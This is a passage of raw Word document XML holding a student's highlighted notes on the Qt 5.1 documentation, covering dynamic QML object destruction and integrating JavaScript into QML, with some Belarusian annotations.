          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (unless you specified a non-zero delay). </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Delete realization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A458A4" w:rsidRPr="00D815C8" w:rsidRDefault="00A458A4" w:rsidP="00A458A4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="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Note also that if a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>SelfDestroyingRect</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t> instance was created statically like this:</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Item</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SelfDestroyingRect</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A458A4" w:rsidRPr="00D815C8" w:rsidRDefault="00A458A4" w:rsidP="00A458A4">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A458A4" w:rsidRPr="00D815C8" w:rsidRDefault="00A458A4" w:rsidP="00A458A4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="24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 xml:space="preserve">This would result in an error, since </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>objects can only be dynamically destroyed if they were dynamically created</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E6A13" w:rsidRPr="00D815C8" w:rsidRDefault="008E6A13" w:rsidP="008E6A13">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Objects created with</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId104" w:anchor="createQmlObject-method" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.createQmlObject()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can similarly be destroyed using</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destroy()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E6A13" w:rsidRPr="00D815C8" w:rsidRDefault="008E6A13" w:rsidP="008E6A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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> newObject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createQmlObject</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'import QtQuick 2.0; Rectangle {color: "red"; width: 20; height: 20}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E6A13" w:rsidRPr="00D815C8" w:rsidRDefault="008E6A13" w:rsidP="008E6A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parentItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E6A13" w:rsidRPr="00D815C8" w:rsidRDefault="008E6A13" w:rsidP="008E6A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"dynamicSnippet1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E6A13" w:rsidRPr="00D815C8" w:rsidRDefault="008E6A13" w:rsidP="008E6A13">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>newObject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destroy</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007071A3" w:rsidRPr="00EC78A6" w:rsidRDefault="00490E7E" w:rsidP="007071A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId105" w:history="1">
        <w:r w:rsidR="007071A3" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00EC78A6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00EC78A6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>project</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00EC78A6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>org</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00EC78A6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00EC78A6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00EC78A6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-5.1/</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtdoc</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00EC78A6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtquick</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00EC78A6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>usecase</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00EC78A6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>integratingjs</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00EC78A6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="007071A3" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DE47F5" w:rsidRPr="00D815C8" w:rsidRDefault="00DE47F5" w:rsidP="00DE043C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_Toc483000559"/>
      <w:bookmarkStart w:id="146" w:name="_Toc483003580"/>
      <w:bookmarkStart w:id="147" w:name="_Toc483603915"/>
      <w:bookmarkStart w:id="148" w:name="_Toc483605135"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use Case - Integrating JavaScript in QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
      <w:bookmarkEnd w:id="146"/>
      <w:bookmarkEnd w:id="147"/>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w:rsidR="00BD0039" w:rsidRPr="00D815C8" w:rsidRDefault="00DE47F5" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaScript code can be easily integrated into QML to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provide UI logic, imperative control</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE043C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>other benefits</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Прызначэнне джава скрыпт. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Лепей зразумець другое.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D6639" w:rsidRPr="00D815C8" w:rsidRDefault="005D6639" w:rsidP="00DE043C">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_Toc483000560"/>
      <w:bookmarkStart w:id="150" w:name="_Toc483003581"/>
      <w:bookmarkStart w:id="151" w:name="_Toc483603916"/>
      <w:bookmarkStart w:id="152" w:name="_Toc483605136"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using JavaScript Expressions for Property Values</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
      <w:bookmarkEnd w:id="150"/>
      <w:bookmarkEnd w:id="151"/>
      <w:bookmarkEnd w:id="152"/>
    </w:p>
    <w:p w:rsidR="005D6639" w:rsidRPr="00D815C8" w:rsidRDefault="005D6639" w:rsidP="005D6639">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="24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lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaScript expressions </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>can be used in QML as bindings</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>. For example:</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Item</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4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Math</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.random()</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height: width &lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ? </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> : (width + </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">) /  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
